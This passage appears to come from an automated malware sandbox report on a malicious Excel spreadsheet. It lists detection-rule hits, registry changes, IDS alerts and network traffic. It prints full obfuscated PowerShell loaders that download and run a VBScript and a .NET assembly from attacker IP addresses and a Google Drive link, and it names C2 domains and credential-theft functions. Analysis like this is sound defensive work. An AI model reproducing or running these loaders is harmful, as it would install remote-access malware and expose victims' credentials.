IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs" , ProcessId: 3196, ProcessName: wscript.exe
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3820, TargetFilename: C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline
          Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3460, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))", CommandLine: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3820, TargetFilename: C:\Users\user\AppData\Local\Temp\legehkn5.guh.ps1

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3820, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline", ProcessId: 4068, ProcessName: csc.exe

          Stealing of Sensitive Information

          barindex
          Source: Registry Key setAuthor: Joe Security: Data: Details: 96 F2 85 C8 08 EE FF 19 BB 15 1A 23 41 33 E7 50 DE 74 86 3D 85 A6 91 3D 72 8E 34 67 93 24 3B 60 71 29 74 55 05 C1 EC BC E2 53 7D 78 38 C4 2F C0 6B 48 A8 39 39 38 87 DC F4 0A A8 CD BA 4B 38 7A B0 A1 1C EF A4 33 7F 8D 54 89 22 7E 16 F4 67 71 1D AE F9 CF 62 EF 09 81 7E 3E 50 FD 6B 2B 72 A3 1A CE BF 3C C2 F1 C5 55 2E FA 4D DD 34 13 E7 51 C7 E4 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 2756, TargetObject: HKEY_CURRENT_USER\Software\Rmc-RXIGCE\exepath
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T05:13:55.976418+010020241971A Network Trojan was detected107.174.146.4680192.168.2.2249162TCP
          2024-10-31T05:13:58.941160+010020241971A Network Trojan was detected107.174.146.4680192.168.2.2249164TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T05:13:55.976399+010020244491Attempted User Privilege Gain192.168.2.2249162107.174.146.4680TCP
          2024-10-31T05:13:58.941100+010020244491Attempted User Privilege Gain192.168.2.2249164107.174.146.4680TCP
          2024-10-31T05:14:19.844813+010020244491Attempted User Privilege Gain192.168.2.2249172107.174.146.4680TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T05:14:33.663885+010020204231Exploit Kit Activity Detected107.174.146.4680192.168.2.2249174TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T05:14:33.663885+010020204251Exploit Kit Activity Detected107.174.146.4680192.168.2.2249174TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T05:14:35.991411+010020365941Malware Command and Control Activity Detected192.168.2.2249176107.175.130.2014645TCP
          2024-10-31T05:14:37.257678+010020365941Malware Command and Control Activity Detected192.168.2.2249178107.175.130.2014645TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T05:14:17.359812+010020490381A Network Trojan was detected142.250.185.65443192.168.2.2249167TCP
          2024-10-31T05:14:38.656033+010020490381A Network Trojan was detected172.217.16.193443192.168.2.2249175TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T05:14:37.177677+010028033043Unknown Traffic192.168.2.2249177178.237.33.5080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T05:13:54.323181+010028582951A Network Trojan was detected107.174.146.4680192.168.2.2249174TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-10-31T05:14:05.455027+010028587951A Network Trojan was detected192.168.2.2249165107.174.146.4680TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: A & C Metrology OC 545714677889Materiale.xlsReversingLabs: Detection: 21%
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,31_2_00404423

          Phishing

          barindex
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].hta, type: DROPPED
          Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49166 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.185.65:443 -> 192.168.2.22:49167 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.22:49173 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.22:49175 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 172.67.162.95:443 -> 192.168.2.22:49161 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49171 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.74.191:443 -> 192.168.2.22:49170 version: TLS 1.2
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdbhP source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdb source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.pdb source: powershell.exe, 00000005.00000002.426757676.00000000023EA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\revod450\revod450.pdbhP source: powershell.exe, 00000012.00000002.477548914.000000000266C000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040AE51 FindFirstFileW,FindNextFileW,31_2_0040AE51
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 41_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,41_2_00407EF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,42_2_00407898
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Temp\bthgghdjthgdlvyictcnxlwgz
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Temp\qqcnootpfzoqahkwlihmmg
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\

          Software Vulnerabilities

          barindex
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficDNS query: name: acesso.run
          Source: global trafficDNS query: name: acesso.run
          Source: global trafficDNS query: name: drive.google.com
          Source: global trafficDNS query: name: drive.usercontent.google.com
          Source: global trafficDNS query: name: acesso.run
          Source: global trafficDNS query: name: drive.google.com
          Source: global trafficDNS query: name: drive.usercontent.google.com
          Source: global trafficDNS query: name: seemebest2024rmc.duckdns.org
          Source: global trafficDNS query: name: seemebest2024rmc.duckdns.org
          Source: global trafficDNS query: name: geoplugin.net
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.250.184.206:443
          Source: global trafficTCP traffic: 192.168.2.22:49175 -> 172.217.16.193:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 107.174.146.46:80
          Source: global trafficTCP traffic: 192.168.2.22:49177 -> 178.237.33.50:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 104.21.74.191:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.250.184.206:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.162.95:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 142.250.185.65:443
